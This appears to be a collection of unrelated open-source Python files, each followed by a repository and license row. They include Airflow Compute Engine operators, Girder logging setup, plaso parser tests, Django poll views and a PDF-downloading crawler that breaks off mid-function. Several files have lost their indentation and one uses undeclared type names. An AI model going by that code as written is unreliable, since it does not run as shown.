from uploaders.google_ads.customer_match.abstract_uploader import GoogleAdsCustomerMatchAbstractUploaderDoFn
from uploaders import utils as utils
from models.execution import DestinationType, AccountConfig
from models.oauth_credentials import OAuthCredentials
class GoogleAdsCustomerMatchMobileUploaderDoFn(GoogleAdsCustomerMatchAbstractUploaderDoFn):
def get_list_definition(self, account_config: AccountConfig, destination_metadata: List[str]) -> Dict[str, Any]:
list_name = destination_metadata[0]
app_id = account_config.app_id
    # Overwrite the default app_id with a custom one if provided.
    if len(destination_metadata) >= 4 and len(destination_metadata[3]) > 0:
app_id = destination_metadata[3]
return {
'membership_status': 'OPEN',
'name': list_name,
'description': 'List created automatically by Megalista',
'membership_life_span': 10000,
'crm_based_user_list': {
'upload_key_type': 'MOBILE_ADVERTISING_ID', #CONTACT_INFO, CRM_ID, MOBILE_ADVERTISING_ID
'data_source_type': 'FIRST_PARTY',
'app_id': app_id
}
}
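  # Illustrative note (editor's addition; the metadata values are made up):
  # with destination_metadata = ['My Mobile List', '', '', 'com.example.app']
  # the fourth entry overrides the account-level app_id, so the resulting user
  # list is keyed by MOBILE_ADVERTISING_ID for 'com.example.app'; with fewer
  # than four entries (or an empty fourth entry) account_config.app_id is used.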
def get_row_keys(self) -> List[str]:
return ['mobile_id']
def get_action_type(self) -> DestinationType:
return DestinationType.ADS_CUSTOMER_MATCH_MOBILE_DEVICE_ID_UPLOAD
| google/megalista | megalista_dataflow/uploaders/google_ads/customer_match/mobile_uploader.py | Python | apache-2.0 | 1,938 |
import sys
sys.path.insert(1, "../../../")
import h2o
def link_functions_tweedie_basic(ip,port):
# Connect to h2o
h2o.init(ip,port)
print "Read in prostate data."
hdf = h2o.upload_file(h2o.locate("smalldata/prostate/prostate_complete.csv.zip"))
print "Testing for family: TWEEDIE"
print "Set variables for h2o."
y = "CAPSULE"
x = ["AGE","RACE","DCAPS","PSA","VOL","DPROS","GLEASON"]
print "Create models with canonical link: TWEEDIE"
model_h2o_tweedie = h2o.glm(x=hdf[x], y=hdf[y], family="tweedie", link="tweedie", alpha=[0.5], Lambda = [0])
print "Compare model deviances for link function tweedie (using precomputed values from R)"
deviance_h2o_tweedie = model_h2o_tweedie.residual_deviance() / model_h2o_tweedie.null_deviance()
assert 0.721452 - deviance_h2o_tweedie <= 0.01, "h2o's residual/null deviance is more than 0.01 lower than R's. h2o: " \
"{0}, r: {1}".format(deviance_h2o_tweedie, 0.721452)
if __name__ == "__main__":
h2o.run_test(sys.argv, link_functions_tweedie_basic)
| ChristosChristofidis/h2o-3 | h2o-py/tests/testdir_algos/glm/pyunit_link_functions_tweedie_basicGLM.py | Python | apache-2.0 | 1,103 |
__author__ = 'Autio'
from distutils.core import setup
import py2exe
setup(windows=['ShitCrimson.py'])
| ArchBang85/S_Crimson | Setup.py | Python | apache-2.0 | 104 |
def test_dummy_request():
from rasa.nlu.emulators.no_emulator import NoEmulator
em = NoEmulator()
norm = em.normalise_request_json({"text": ["arb text"]})
assert norm == {"text": "arb text", "time": None}
norm = em.normalise_request_json({"text": ["arb text"], "time": "1499279161658"})
assert norm == {"text": "arb text", "time": "1499279161658"}
def test_dummy_response():
from rasa.nlu.emulators.no_emulator import NoEmulator
em = NoEmulator()
data = {"intent": "greet", "text": "hi", "entities": {}, "confidence": 1.0}
assert em.normalise_response_json(data) == data
def test_emulators_can_handle_missing_data():
from rasa.nlu.emulators.luis import LUISEmulator
em = LUISEmulator()
norm = em.normalise_response_json(
{"text": "this data doesn't contain an intent result"}
)
assert norm["prediction"]["topIntent"] is None
assert norm["prediction"]["intents"] == {}
| RasaHQ/rasa_nlu | tests/nlu/emulators/test_no_emulator.py | Python | apache-2.0 | 948 |
#
# Copyright 2014-2015 Boundary, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
class SourceList(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.path = "v1/account/sources/"
self.method = "GET"
def getDescription(self):
return "Lists the sources in a Boundary account"
| wcainboundary/boundary-api-cli | boundary/source_list.py | Python | apache-2.0 | 856 |
# Task 2. Variant 8.
# Write a program that prints to the screen your favourite saying by Lao Tzu. Do not forget that the author must be mentioned on a separate line.
# Ionova A. K.
#30.04.2016
print("Нельзя обожествлять бесов.\n\t\t\t\t\t\t\t\tЛао-цзы")
input("Нажмите ENTER для выхода.") | Mariaanisimova/pythonintask | INBa/2015/Ionova_A_K/task_2_8.py | Python | apache-2.0 | 579 |
from fruits import validate_fruit
fruits = ["banana", "lemon", "apple", "orange", "batman"]
print fruits
def list_fruits(fruits, byName=True):
if byName:
# WARNING: this won't make a copy of the list and return it. It will change the list FOREVER
fruits.sort()
for index, fruit in enumerate(fruits):
if validate_fruit(fruit):
print "Fruit nr %d is %s" % (index, fruit)
else:
print "This %s is no fruit!" % (fruit)
list_fruits(fruits)
print fruits
| Painatalman/python101 | sources/101_test.py | Python | apache-2.0 | 519 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow import AirflowException
from airflow.contrib.hooks.gcp_compute_hook import GceHook
from airflow.contrib.utils.gcp_field_validator import GcpBodyFieldValidator
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class GceBaseOperator(BaseOperator):
"""
Abstract base operator for Google Compute Engine operators to inherit from.
"""
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
self.project_id = project_id
self.zone = zone
self.full_location = 'projects/{}/zones/{}'.format(self.project_id,
self.zone)
self.resource_id = resource_id
self.gcp_conn_id = gcp_conn_id
self.api_version = api_version
self._validate_inputs()
self._hook = GceHook(gcp_conn_id=self.gcp_conn_id, api_version=self.api_version)
super(GceBaseOperator, self).__init__(*args, **kwargs)
def _validate_inputs(self):
if not self.project_id:
raise AirflowException("The required parameter 'project_id' is missing")
if not self.zone:
raise AirflowException("The required parameter 'zone' is missing")
if not self.resource_id:
raise AirflowException("The required parameter 'resource_id' is missing")
def execute(self, context):
pass
class GceInstanceStartOperator(GceBaseOperator):
"""
Start an instance in Google Compute Engine.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
super(GceInstanceStartOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def execute(self, context):
return self._hook.start_instance(self.project_id, self.zone, self.resource_id)
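# Illustrative DAG usage sketch (editor's addition; project, zone and instance
# names are placeholders):
#   start_instance = GceInstanceStartOperator(
#       task_id='gce_start_example',
#       project_id='my-gcp-project',
#       zone='europe-west1-b',
#       resource_id='my-instance')
# task_id is consumed by BaseOperator via **kwargs; the remaining arguments are
# template_fields, so Jinja expressions may be used for them.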
class GceInstanceStopOperator(GceBaseOperator):
"""
Stop an instance in Google Compute Engine.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
gcp_conn_id='google_cloud_default',
api_version='v1',
*args, **kwargs):
super(GceInstanceStopOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def execute(self, context):
return self._hook.stop_instance(self.project_id, self.zone, self.resource_id)
SET_MACHINE_TYPE_VALIDATION_SPECIFICATION = [
dict(name="machineType", regexp="^.+$"),
]
class GceSetMachineTypeOperator(GceBaseOperator):
"""
Changes the machine type for a stopped instance to the machine type specified in
the request.
:param project_id: Google Cloud Platform project where the Compute Engine
instance exists.
:type project_id: str
:param zone: Google Cloud Platform zone where the instance exists.
:type zone: str
:param resource_id: Name of the Compute Engine instance resource.
:type resource_id: str
:param body: Body required by the Compute Engine setMachineType API, as described in
https://cloud.google.com/compute/docs/reference/rest/v1/instances/setMachineType#request-body
:type body: dict
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
:param api_version: API version used (e.g. v1).
:type api_version: str
"""
template_fields = ('project_id', 'zone', 'resource_id', 'gcp_conn_id', 'api_version')
@apply_defaults
def __init__(self,
project_id,
zone,
resource_id,
body,
gcp_conn_id='google_cloud_default',
api_version='v1',
validate_body=True,
*args, **kwargs):
self.body = body
self._field_validator = None
if validate_body:
self._field_validator = GcpBodyFieldValidator(
SET_MACHINE_TYPE_VALIDATION_SPECIFICATION, api_version=api_version)
super(GceSetMachineTypeOperator, self).__init__(
project_id=project_id, zone=zone, resource_id=resource_id,
gcp_conn_id=gcp_conn_id, api_version=api_version, *args, **kwargs)
def _validate_all_body_fields(self):
if self._field_validator:
self._field_validator.validate(self.body)
def execute(self, context):
self._validate_all_body_fields()
return self._hook.set_machine_type(self.project_id, self.zone,
self.resource_id, self.body)
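# Illustrative usage sketch (editor's addition; names are placeholders). The
# body follows the instances.setMachineType request format referenced in the
# docstring, and only its 'machineType' key is validated above:
#   set_machine_type = GceSetMachineTypeOperator(
#       task_id='gce_set_machine_type_example',
#       project_id='my-gcp-project',
#       zone='europe-west1-b',
#       resource_id='my-instance',
#       body={'machineType': 'zones/europe-west1-b/machineTypes/n1-standard-4'})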
| sid88in/incubator-airflow | airflow/contrib/operators/gcp_compute_operator.py | Python | apache-2.0 | 7,129 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import cherrypy
import functools
import logging
import logging.handlers
import os
import six
import sys
import traceback
from girder.constants import LOG_ROOT, MAX_LOG_SIZE, LOG_BACKUP_COUNT, TerminalColor, VERSION
from girder.utility import config, mkdir
from girder.utility._cache import cache, requestCache, rateLimitBuffer
__version__ = '2.5.0'
__license__ = 'Apache 2.0'
VERSION['apiVersion'] = __version__
_quiet = False
_originalStdOut = sys.stdout
_originalStdErr = sys.stderr
class LogLevelFilter(object):
"""
Filter log records based on whether they are between a min and max level.
"""
def __init__(self, min, max):
self.minLevel = min
self.maxLevel = max
def filter(self, logRecord):
level = logRecord.levelno
return self.maxLevel >= level >= self.minLevel
class LogFormatter(logging.Formatter):
"""
Custom formatter that adds useful information about the request to the logs
when an exception happens. Cherrypy access logs are passed through without
change.
"""
def formatException(self, exc):
info = '\n'.join((
' Request URL: %s %s' % (cherrypy.request.method.upper(),
cherrypy.url()),
' Query string: ' + cherrypy.request.query_string,
' Remote IP: ' + cherrypy.request.remote.ip
))
return ('%s\n'
'Additional info:\n'
'%s' % (logging.Formatter.formatException(self, exc), info))
def format(self, record, *args, **kwargs):
if hasattr(record, 'name') and hasattr(record, 'message'):
if (record.name.startswith('cherrypy.access') or
record.name.startswith('cherrypy.error')):
return record.message
return super(LogFormatter, self).format(record, *args, **kwargs)
class StreamToLogger(object):
"""
Redirect a file-like stream to a logger.
"""
def __init__(self, stream, logger, level):
self.stream = stream
self.logger = logger
self.level = level
self.logger._girderLogHandlerOutput = False
# This class is intended to override a default stream like sys.stdout
# and sys.stderr and send that information to both the original stream
# and the logger method. However, we want to preserve as much
# functionality for stdout and stderr as possible, so that other
# modules that send data to them can do so without a problem. The only
# method we really need to override is write, but we cannot mutate the
# write method on the stream itself, so we replace the stream with this
# custom class. To preserve the stream methods, all of them get added
# to our class instance except private and built-in methods, which, in
# python, begin with _.
# Fundamentally, this lets our stream replacement handle functions
# flush, writeline, and others without having to enumerate them
# individually.
for key in dir(stream):
# It's possible for a file-like object to have name appear in dir(stream) but not
# actually be an attribute, thus using a default with getattr is required.
# See https://github.com/GrahamDumpleton/mod_wsgi/issues/184 for more.
if (key != 'write' and not key.startswith('_') and (
callable(getattr(stream, key, None)) or
isinstance(getattr(stream, key, None), (
six.binary_type, six.string_types, six.integer_types, bool)))):
setattr(self, key, getattr(stream, key))
def write(self, buf):
if not self.logger._girderLogHandlerOutput:
self.logger._girderLogHandlerOutput = True
self.stream.write(buf)
for line in buf.rstrip().splitlines():
self.logger.log(self.level, line.rstrip())
self.logger._girderLogHandlerOutput = False
def getLogPaths():
"""
Return the paths to the error and info log files. These are returned as
a dict with "error" and "info" keys that point to the respective file,
as well as a "root" key pointing to the log root directory.
"""
cfg = config.getConfig()
logCfg = cfg.get('logging', {})
root = os.path.expanduser(logCfg.get('log_root', LOG_ROOT))
return {
'root': root,
'error': logCfg.get('error_log_file', os.path.join(root, 'error.log')),
'info': logCfg.get('info_log_file', os.path.join(root, 'info.log'))
}
def _setupLogger():
"""
Sets up the Girder logger.
"""
global _quiet
logger = logging.getLogger('girder')
cfg = config.getConfig()
logCfg = cfg.get('logging', {})
# If we are asked to be quiet, set a global flag so that logprint doesn't
# have to get the configuration settings every time it is used.
if logCfg.get('log_quiet') is True:
_quiet = True
logPaths = getLogPaths()
# Ensure log paths are valid
logDirs = [
logPaths['root'],
os.path.dirname(logPaths['info']),
os.path.dirname(logPaths['error'])
]
for logDir in logDirs:
mkdir(logDir)
# Set log level
level = logging.INFO
if logCfg.get('log_level') and isinstance(getattr(logging, logCfg['log_level'], None), int):
level = getattr(logging, logCfg['log_level'])
logger.setLevel(logging.DEBUG if level is None else level)
logSize = MAX_LOG_SIZE
if logCfg.get('log_max_size'):
sizeValue = logCfg['log_max_size']
sizeUnits = {'kb': 1024, 'Mb': 1024 ** 2, 'Gb': 1024 ** 3}
if sizeValue[-2:] in sizeUnits:
logSize = int(sizeValue[:-2].strip()) * sizeUnits[sizeValue[-2:]]
else:
logSize = int(sizeValue)
backupCount = int(logCfg.get('log_backup_count', LOG_BACKUP_COUNT))
    # Remove extant log handlers (this allows this function to be called
    # multiple times)
for handler in list(logger.handlers):
if hasattr(handler, '_girderLogHandler'):
logger.removeHandler(handler)
cherrypy.log.access_log.removeHandler(handler)
fmt = LogFormatter('[%(asctime)s] %(levelname)s: %(message)s')
infoMaxLevel = logging.INFO
# Create log handlers
if logPaths['error'] != logPaths['info']:
eh = logging.handlers.RotatingFileHandler(
logPaths['error'], maxBytes=logSize, backupCount=backupCount)
eh.setLevel(level)
eh.addFilter(LogLevelFilter(min=logging.WARNING, max=logging.CRITICAL))
eh._girderLogHandler = 'error'
eh.setFormatter(fmt)
logger.addHandler(eh)
# Record cherrypy errors in our logs, too
cherrypy.log.error_log.addHandler(eh)
else:
infoMaxLevel = logging.CRITICAL
if isinstance(getattr(logging, logCfg.get('log_max_info_level', ''), None), int):
infoMaxLevel = getattr(logging, logCfg['log_max_info_level'])
ih = logging.handlers.RotatingFileHandler(
logPaths['info'], maxBytes=logSize, backupCount=backupCount)
ih.setLevel(level)
ih.addFilter(LogLevelFilter(min=logging.DEBUG, max=infoMaxLevel))
ih._girderLogHandler = 'info'
ih.setFormatter(fmt)
logger.addHandler(ih)
# Record cherrypy errors in our logs, too
cherrypy.log.error_log.addHandler(ih)
# Log http accesses to the screen and/or the info log.
accessLog = logCfg.get('log_access', 'screen')
if not isinstance(accessLog, (tuple, list, set)):
accessLog = [accessLog]
if _quiet or ('screen' not in accessLog and 'stdout' not in accessLog):
cherrypy.config.update({'log.screen': False})
if 'info' in accessLog:
cherrypy.log.access_log.addHandler(ih)
return logger
logger = _setupLogger()
def logStdoutStderr(force=False):
if _originalStdOut == sys.stdout or force:
sys.stdout = StreamToLogger(_originalStdOut, logger, logging.INFO)
sys.stderr = StreamToLogger(_originalStdErr, logger, logging.ERROR)
def logprint(*args, **kwargs):
"""
    Send a message to both stdout and the appropriate logs. This behaves like
    Python 3's print function, but takes additional named parameters:
:param level: the log level. This determines which log handlers will store
the log message. The log is always sent to stdout.
:param color: one of the constants.TerminalColor values or None.
:param exc_info: None to not print exception information. True for the
last exception, or a tuple of exception information.
"""
data = six.StringIO()
kwargs = (kwargs or {}).copy()
level = kwargs.pop('level', logging.DEBUG)
color = kwargs.pop('color', None)
exc_info = kwargs.pop('exc_info', None)
kwargs['file'] = data
six.print_(*args, **kwargs)
data = data.getvalue().rstrip()
if exc_info and not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
data += '\n' + ''.join(traceback.format_exception(*exc_info)).rstrip()
logger.log(level, data)
if not _quiet:
if color:
data = getattr(TerminalColor, color)(data)
_originalStdOut.write('%s\n' % data)
_originalStdOut.flush()
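# Illustrative usage sketch (editor's addition; the messages are made up):
#   logprint('rebuilding search index', level=logging.INFO, color='info')
# The partials defined at the bottom of this module provide the usual
# shortcuts, e.g. logprint.warning('low disk space') or, inside an except
# block, logprint.exception('failed to save item').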
def _setupCache():
"""
    Set up caching based on the configuration file.
Cache backends are forcibly replaced because Girder initially configures
the regions with the null backends.
"""
curConfig = config.getConfig()
if curConfig['cache']['enabled']:
# Replace existing backend, this is necessary
# because they're initially configured with the null backend
cacheConfig = {
'cache.global.replace_existing_backend': True,
'cache.request.replace_existing_backend': True
}
curConfig['cache'].update(cacheConfig)
cache.configure_from_config(curConfig['cache'], 'cache.global.')
requestCache.configure_from_config(curConfig['cache'], 'cache.request.')
else:
# Reset caches back to null cache (in the case of server teardown)
cache.configure(backend='dogpile.cache.null', replace_existing_backend=True)
requestCache.configure(backend='dogpile.cache.null', replace_existing_backend=True)
# Although the rateLimitBuffer has no pre-existing backend, this method may be called multiple
# times in testing (where caches were already configured)
rateLimitBuffer.configure(backend='dogpile.cache.memory', replace_existing_backend=True)
# Expose common logging levels and colors as methods of logprint.
logprint.info = functools.partial(logprint, level=logging.INFO, color='info')
logprint.warning = functools.partial(
logprint, level=logging.WARNING, color='warning')
logprint.error = functools.partial(
logprint, level=logging.ERROR, color='error')
logprint.success = functools.partial(
logprint, level=logging.INFO, color='success')
logprint.critical = functools.partial(
logprint, level=logging.CRITICAL, color='error')
logprint.debug = logprint
logprint.exception = functools.partial(
logprint, level=logging.ERROR, color='error', exc_info=True)
# alias girder.plugin => girder.utility.plugin_utilities
from girder.utility import plugin_utilities as plugin # noqa
| Xarthisius/girder | girder/__init__.py | Python | apache-2.0 | 12,075 |
"""
Copyright 2016 Andrea McIntosh
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
class IndexView(generic.ListView):
template_name = "polls/index.html"
context_object_name = 'latest_question_list'
def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| akmcinto/TodoApp | ToDoApp/polls/views.py | Python | apache-2.0 | 1,788 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Setupapi log parser."""
from __future__ import unicode_literals
import unittest
from plaso.parsers import setupapi
from tests.parsers import test_lib
class SetupapiLogUnitTest(test_lib.ParserTestCase):
"""Tests for the Windows Setupapi log parser.
Since Setupapi logs record in local time, these tests assume that the local
timezone is set to UTC.
"""
def testParseDevLog(self):
"""Tests the Parse function on setupapi.dev.log."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(['setupapi.dev.log'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 388)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:59:28.110000')
event = events[2]
self.CheckTimestamp(event.timestamp, '2016-10-05 11:16:03.747000')
event = events[4]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2016-10-05 11:16:16.471000')
expected_message = (
'Device Install (Hardware initiated) - SWD\\IP_TUNNEL_VBUS'
'\\Teredo_Tunnel_Device')
expected_short_message = (
'Device Install (Hardware initiated) - SWD\\IP_TUNNEL_VBUS'
'\\Teredo_Tunnel_Device')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[57]
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_message = (
'Device Install (DiInstallDriver) - C:\\Windows\\System32'
'\\DriverStore\\FileRepository\\prnms003.inf_x86_8f17aac186c70ea6'
'\\prnms003.inf - SUCCESS')
expected_short_message = (
'SUCCESS - Device Install (DiInstallDriver) - C:\\Windows\\System32'
'\\DriverStore\\...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[386]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2016-11-22 23:50:30.938000')
expected_message = (
'Device Install (Hardware initiated) - SWD\\WPDBUSENUM'
'\\_??_USBSTOR#Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07#99E2116A&0'
'#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}')
expected_short_message = (
'Device Install (Hardware initiated) - SWD\\WPDBUSENUM'
'\\_??_USBSTOR#Disk&Ven_Gen...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testParseSetupLog(self):
"""Tests the Parse function on setupapi.setup.log."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(['setupapi.setup.log'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 32)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:16.599000')
event = events[2]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:28.973000')
event = events[4]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:29.305000')
expected_message = 'Setup Plug and Play Device Install'
expected_short_message = 'Setup Plug and Play Device Install'
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[14]
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_message = (
'Setup online Device Install (Hardware initiated) - SW'
'\\{97ebaacc-95bd-11d0-a3ea-00a0c9223196}'
'\\{53172480-4791-11D0-A5D6-28DB04C10000}')
expected_short_message = (
'Setup online Device Install (Hardware initiated) - SW'
'\\{97ebaacc-95bd-11d0-a3e...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[30]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2015-11-22 17:57:17.502000')
expected_message = (
'Setup Import Driver Package - C:\\Windows\\system32'
'\\spool\\tools\\Microsoft XPS Document Writer\\prnms001.Inf')
expected_short_message = (
'Setup Import Driver Package - C:\\Windows\\system32\\spool'
'\\tools\\Microsoft XPS D...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testParseSetupLogWithTimeZone(self):
"""Tests the Parse function on setupapi.setup.log with a time zone."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(
['setupapi.setup.log'], parser, timezone='CET')
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 32)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 16:53:16.599000')
if __name__ == '__main__':
unittest.main()
| rgayon/plaso | tests/parsers/setupapi.py | Python | apache-2.0 | 5,214 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
crawler.py
~~~~~~~~~~~~~~
A brief description goes here.
"""
import csv
import urllib2
import urllib
import re
import os
import urlparse
import threading
import logging
import logging.handlers
import time
import random
import bs4
MINIMUM_PDF_SIZE = 4506
TASKS = None
def create_logger(filename, logger_name=None):
logger = logging.getLogger(logger_name or filename)
fmt = '[%(asctime)s] %(levelname)s %(message)s'
datefmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(fmt=fmt, datefmt=datefmt)
handler = logging.handlers.RotatingFileHandler(filename, maxBytes=1024 * 1024 * 1024, backupCount=10)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
return logger
log = create_logger('crawl.log')
class ExceedMaximumRetryError(Exception):
def __init__(self, sbid, url):
self.sbid = sbid
self.url = url
def retrieve(url, sbid, output_folder):
"""Download the PDF or search for the webpage for any PDF link
Args:
url, assuming the input url is valid
"""
def _urlfetch(url, sbid, filename=None, retry=10):
"""
        A wrapper around urllib.urlretrieve or urllib2.urlopen, chosen
        depending on whether a filename is given.
"""
if filename and os.path.exists(filename):
log.warn("%s\tDUPLICATED\t%s" % (sbid, url))
return None
sleep_time = random.random() + 0.5
for i in range(1, retry+1):
try:
result = None
if filename:
result = urllib.urlretrieve(url, filename)
log.info("%s\tOK\t%s" % (sbid, url))
else:
# No log now, because later we would like to ensure
# the existance of PDFs
result = urllib2.urlopen(url).read()
return result
except urllib.ContentTooShortError as e:
log.warn("%s\tContentTooShortError\t%s\tRetry:%i&Sleep:%.2f" %
(sbid, url, i, sleep_time))
time.sleep(sleep_time)
except urllib2.HTTPError as e:
log.warn("%s\tHTTP%i\t%s\tRetry:%i&Sleep:%.2f\t%s" %
(sbid, e.code, url, i, sleep_time, e.reason))
time.sleep(sleep_time)
                # Sleep longer if it is a server error
# http://en.wikipedia.org/wiki/Exponential_backoff
if e.code / 100 == 5:
sleep_time = random.randint(0, 2 ** i - 1)
except urllib2.URLError as e:
log.warn("%s\tURLError\t%s\tRetry:%i&Sleep:%.2f\t%s" %
(sbid, url, i, sleep_time, e.reason))
time.sleep(sleep_time)
raise ExceedMaximumRetryError(sbid=sbid, url=url)
if url.endswith('.pdf'):
#: sbid is not unique, so use sbid+pdfname as new name
pdf_name = url.split('/')[-1].split('.')[0]
_urlfetch(url, sbid, os.path.join(output_folder, "%s.%s.pdf" % (sbid, pdf_name)))
else:
page = _urlfetch(url, sbid)
soup = bs4.BeautifulSoup(page)
anchors = soup.findAll('a', attrs={'href': re.compile(".pdf$", re.I)})
if not anchors:
log.warn("%s\tNO_PDF_DETECTED\t%s" % (sbid, url))
return None
for a in anchors:
href = a['href']
pdf_name = href.split('/')[-1]
sub_url = urlparse.urljoin(url, href)
_urlfetch(sub_url, sbid, os.path.join(output_folder, "%s.%s" % (sbid, pdf_name)))
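# Illustrative note (editor's addition; the URL and id are made up): a direct
# PDF link such as
#   retrieve('http://example.com/papers/fish_survey.pdf', 'SB0001', 'pdfs')
# is saved as pdfs/SB0001.fish_survey.pdf, while a non-PDF landing page is
# fetched and scanned for anchors ending in ".pdf", each of which is then
# downloaded as pdfs/<sbid>.<pdf_name>.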
def get_tasks(csv_filepath):
"""
Returns:
[{'ScienceBaseID': a1b2c3d4, 'webLinks__uri': 'http://balabala'}, {}]
"""
l = []
with open(csv_filepath, 'r') as f:
reader = csv.DictReader(f, delimiter=',', quotechar='"')
for row in reader:
if 'Action' in row and row['Action'].lower() == 'ignore for now':
continue
else:
l.append(row)
return l
def get_completed_tasks(output_folder):
"""
Return downloaded tasks
"""
completed = set()
for f in os.listdir(output_folder):
filepath = os.path.join(output_folder, f)
with open(filepath, 'r') as ff:
head_line = ff.readline()
#if os.stat(filepath).st_size > MINIMUM_PDF_SIZE:
if head_line.startswith("%PDF"):
completed.add(f.split('.')[0])
else:
os.remove(filepath)
print 'deleted: ', filepath, head_line
return completed
def crawl(csv_filepath, output_folder='pdfs', exclude_downloaded=False):
"""main function
"""
global TASKS
TASKS = get_tasks(csv_filepath)
excluded = set()
if exclude_downloaded:
excluded = get_completed_tasks(output_folder)
